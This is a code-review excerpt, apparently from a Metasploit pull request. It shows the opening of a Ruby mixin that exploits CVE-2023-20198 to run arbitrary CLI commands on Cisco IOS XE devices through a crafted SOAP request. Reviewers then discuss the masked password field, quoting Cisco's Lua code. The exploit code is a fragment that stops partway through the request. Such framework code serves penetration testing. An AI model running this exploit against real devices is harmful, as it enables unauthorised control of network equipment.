lib/msf/core/exploit/remote/http/cisco_ios_xe.rb

```diff
@@ -0,0 +1,82 @@
+module Msf
+  module Exploit::Remote::HTTP::CiscoIosXe
+
+    # Leverage CVE-2023-20198 to run an arbitrary CLI command against a vulnerable Cisco IOX XE device.
+    def run_cli_command(cmd, username = 'vty0')
+
+      # As we place the cmd in CDATA, we cannot have hte closing tag in the command.
+      if cmd.include? ']]>'
+        print_error("CLI command contain bad sequence ']]>'.")
+        return nil
+      end
+
+      xml = %(<?xml version="1.0"?>
+  <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+    <SOAP:Header>
+      <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
+        <wsse:UsernameToken SOAP:mustUnderstand="false">
+          <wsse:Username>#{username}</wsse:Username>
+          <wsse:Password>*****</wsse:Password>
```

Comment:
```suggestion
          <wsse:Password>#{Rex::Text.rand_text_alpha(8)}</wsse:Password>
```

Reply:
The string `*****` comes from how the Cisco Lua code expects to pass the password, and a comment in the Lua code notes its purpose:

```lua
-- Mask the password. It is for audit purposes only and it doesnt use it for authentication
FString  = string.gsub(FString,"#password","*****")
```

With this in mind I don't think we should change the string to a random alpha text. It makes more sense to leave it as the expected value.

Reply:
Wow, amazing. In a bad way. But still, amazing.